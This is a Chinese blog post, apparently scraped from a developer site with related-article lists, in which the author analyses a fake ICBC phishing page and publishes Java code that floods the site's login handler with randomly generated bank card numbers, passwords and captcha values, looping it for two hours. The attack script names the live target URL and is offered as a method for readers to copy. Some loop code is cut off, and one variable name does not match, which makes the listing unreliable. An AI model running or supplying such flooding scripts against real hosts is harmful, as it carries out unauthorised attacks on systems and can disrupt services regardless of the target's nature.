接触网络一段时间的用户都会多多少少遇到一些钓鱼网站，而作为开发者的我们遇到的钓鱼网站更是数不胜数，有时稍不留神就会被钓鱼网站将自己的重要信息钓走，对于钓鱼网站我们也是咬牙切齿，当我们发现钓鱼网站后，我们总是气愤后关闭离开，或者有些正义感的朋友会选择举报该网站。这一次我来讲个更绝的，通过分析钓鱼网站获得其传输方法，发送垃圾数据反击作者。

先说说今天的经历，今天早上去了一趟科技市场，回来发现自己两台不同的手机多了两条相同的发自95588的信息，大致的内容是我的工行密保被冻结了，登陆wap-icbce.pw去解冻，咋看下去好像确实有点蹊跷，登陆上去还真是有模有样:

我乱输入了一个卡号和密码，会显示这样的一个界面

无论你输入什么，他都会显示这样一个界面，后来我又去工行确认了一下，人工服务告诉我这确实是一个钓鱼网站。我作为一个一身正气的人怎么能置之不理呢？首先我先举报了这个网站，发现这还没解气，我尝试使用电脑登陆这个网站，发现这个网站为了防止电脑的防护软件还不让电脑来登陆了。

没关系，使用强大的chrome我成功的在电脑上打开了这个网站（方法不具体说明了，详细参阅百度百科上的chrome开启手机网站的方法）

现在我们可以开始分析网站的源代码了，该钓鱼网站使用.net技术进行编写，感觉网站除了设计方面剩下都是粗制滥造，验证码也是放着其实并没有进行验证，网站的首页是一个识别是否是手机登陆的小图片，如果是手机登陆点击会使用submit字段随便传回一段字符，猜测在该网页的服务器端判断这submit字符应该仅仅使用是否为null来进行判断。

进入这个登录界面，我们能看到里边table字段中清晰的写着用户名密码以及验证码的name，而且获取方式是使用post获取，字符编码使用gb2312，网站分析基本到此结束，现在好戏开场了，首先我使用java编写一段发送数据至asp的java访问代码：

  public static String doPost(String reqUrl, Map parameters, String recvEncoding) {HttpURLConnection conn = null;String responseContent = null;try {StringBuffer params = new StringBuffer();for (Iterator iter = parameters.entrySet().iterator(); iter.hasNext();) {Entry element = (Entry) iter.next();params.append(element.getKey().toString());params.append("=");params.append(URLEncoder.encode(element.getValue().toString(), recvEncoding));params.append("&");}if (params.length() > 0) {params = params.deleteCharAt(params.length() - 1);}URL url = new URL(reqUrl);HttpURLConnection url_con = (HttpURLConnection) url.openConnection();url_con.setRequestMethod("POST");url_con.setConnectTimeout(5000);//（单位：毫秒）jdkurl_con.setDoOutput(true);byte[] b = params.toString().getBytes();url_con.getOutputStream().write(b, 0, b.length);url_con.getOutputStream().flush();url_con.getOutputStream().close();InputStream in = url_con.getInputStream();BufferedReader rd = new BufferedReader(new InputStreamReader(in, recvEncoding));String tempLine = rd.readLine();StringBuffer tempStr = new StringBuffer();String crlf = System.getProperty("line.separator");while (tempLine != null) {tempStr.append(tempLine);tempStr.append(crlf);tempLine = rd.readLine();}responseContent = tempStr.toString();rd.close();in.close();} catch (IOException e) {e.printStackTrace();} finally {if (conn != null) {conn.disconnect();}}return responseContent;}

测试没问题后，既然要冲击网站，我们先要随机一些银行卡用户名和密码。

先定义一些需要用到的参数以及要攻击网站的action以及发送的字符编码：

Map m = new HashMap();
String url = "http://wap-icbce.pw/add_1.asp";
String code = "gb2312";

首先银行卡前缀一般是固定的，前十位不随机生成：

String randomcarnum10="6222022102";

后9位就进行一个随机生成的工作：

int randomnum;
randomnum = (int) (Math.random()*1000000000);
randomcarnum10+=randomnum;

按照大部分人的习惯，密码都是前面几个字母+后边几个数字，我们随机前后字母的数量随机生成：

int loopentime,loopnumtime;
loopentime=(int) (Math.random()*10);//随机的英文密码长度
loopnumtime=(int) (Math.random()*10);//随机的中文密码长度
String randompsw = "";
String chars = "abcdefghijklmnopqrstuvwxyz";
for(int i=0;i
randompsw+=chars.charAt((int)(Math.random() * 26));
for(int i=0;i
randompsw+=(int)(Math.random() * 10);

为了以防万一，验证码也随机生成提交：

String randomidcode;
randomidcode=(int)(Math.random()*10000)+"";

最后将数据直接发送到钓鱼网站服务器端：

m.put("logonCardNum", randomcarnum);
m.put("netType", randompsw);
m.put("randomId", randomidcode);
String rus = doPost(url, m, code);
//
System.out.println(rus);

让我们看看成果吧，在程序代码的最后我在控制台中输出了钓鱼网站返回的html文本内容

对比一下钓鱼网站出现的等待跳转界面的html文本内容，基本能确定应该是已经上传数据成功了！写个循环，让程序跑个2小时

这次网站攻击采用了简单的网页关键信息获取方法，以及编写简单的java代码，达到反击钓鱼网站的目的，写这篇文章也是希望能够抛砖引玉，大神轻喷，我有什么建议私信给我，我会很乐于接受多学习多改进。

巧用网页分析“反击”钓鱼网站相关推荐

1. 【WEB安全】轻松检测钓鱼网站的技巧

   你可能会认为钓鱼网站很难检测和跟踪,但实际上,许多钓鱼网站都包含唯一标识它们的HTML片段. 你可能会认为钓鱼网站很难检测和跟踪,但实际上,许多钓鱼网站都包含唯一标识它们的HTML片段.本文就以英国皇 ...

2. 6月共处理钓鱼网站8186个：非CN域名达8029个

   IDC评述网(idcps.com)07月31日报道:近日,中国反钓鱼网站联盟发布了<2014年6月钓鱼网站处理简报>.据报告显示,在6月份,联盟共处理钓鱼网站8186个,环比增多:截至20 ...

3. 7月共处理钓鱼网站1921个：非CN域名达1911 个

   中国IDC评述网08月14日报道:近日,中国反钓鱼网站联盟公布了<2012年7月钓鱼网站处理简报>.据报告显示,7月份,联盟共处理钓鱼网站1921个,截至2012年7月份,联盟累计认定并处 ...

4. 11月钓鱼网站简报：阿里巴巴占比居首 新网次之

   IDC评述网(idcps.com)12月22日报道:近日,中国反钓鱼网站联盟发布了<2015年11月钓鱼网站处理简报>.据报告显示,11月份,联盟共处理钓鱼网站7644个,较上月下降了25 ...

5. 简单的钓鱼网站制作-Setoolkit

   Setoolki这个工具在kali自带,github地址:https://github.com/trustedsec/social-engineer-toolkit git clone https:/ ...

6. 钓鱼网站php,偶遇钓鱼网站的一次代码审计

   偶遇一个钓鱼邮件中的钓鱼网站,并与年华大佬做了代码审计.据说近期全国出现多起钓鱼邮件事件,主要以各大高校为主,已有不少人上当,还需多加注意. 分析钓鱼网站 钓鱼网站采用常用空间钓鱼CMS搭建,可通过百 ...

7. 仿“唯品会”钓鱼网站分析

   引言:         昨天晚上,一个朋友找我说自己被骗了,了解到原来是打开了钓鱼网站输入了自己信息和银行卡信息,虽然到最后一步发现了猫腻,但是信息已经泄露出去了,据说是唯品会的卖家给她发的信息,说之 ...

8. 使用setoolkit克隆钓鱼网站时修改网页错误的解决方法

   • 使用 2021.3最新版kali 自带 setoolkit,默认配置文件中apache_serer = off,不需要开启apache服务,直接用python开启web服务,能够完成克隆,网页放在 ...

9. 使用pig对钓鱼网站链接url做词频统计【大数据处理与分析技术】

   使用pig对钓鱼网站链接url做词频统计(大数据处理与分析技术) 数据展示:(verified_online.csv) grunt> A = load 'verified_online.csv' ...

最新文章

1. 有java基础的人学python_准备自学Python ，会java，有什么建议吗？
2. 从源代码编译里程碑的 ICS ROM
3. 这8份前沿Paper+Code ，你一定用得上！
4. 每日程序C语言20-利用递归求阶乘
5. 在ubuntu用arm ds-5社区版配合linaro交叉编译工具开发android linux应用
6. SAP ABAP实用技巧介绍系列之 How is configuration data loaded
7. linux删除、读取文件原理
8. 代码内查找函数引用_叮~~二级操作题 excel常考函数大梳理
9. 只会python怎么挣钱_业余学python有用吗
10. 真机调试时部分日志丢失（魅族）
11. 每日一题/012/数学分析/求极限/拉格拉日中值定理/幂指函数求导
12. 使用QT5 PrintSupport打印和预览标签
13. 阻抗匹配四参数：反射系数、行波系数、驻波比、回波损耗
14. 1079：计算分数加减表达式的值 题解 信息学奥赛 NOIP
15. c语言字符串把小写转换大写字母,c语言将字符串中的小写字母转换成大写字母分享...
16. 压缩包已损坏或压缩格式未知无法打开 的解决办法
17. 枚举Word表格AutoFormat样式
18. Echarts通用饼图、柱状图、折线图封装
19. cf1341 Nastya and Door
20. 大学计算机系英语自我介绍,计算机专业复试英语自我介绍范文

热门文章

1. 01.14第65期短中线黑马推荐！
2. 人力资源招聘的黄金法则
3. CUMT矿大----电路与数字系统实验四 计数、译码、显示的HDL设计
4. 百度网盘15G邀请码
5. VS 2017经常出现打不开问题
6. FishHook钩子库开发日志
7. Windows下Latex的系统路径增添，使用命令编译
8. 《密码朋克:自由与互联网的未来》[澳] 朱利安-阿桑奇
9. 让页面滑动流畅得飞起的新特性：Passive Event Listeners
10. 什么是GC root ，GC root原理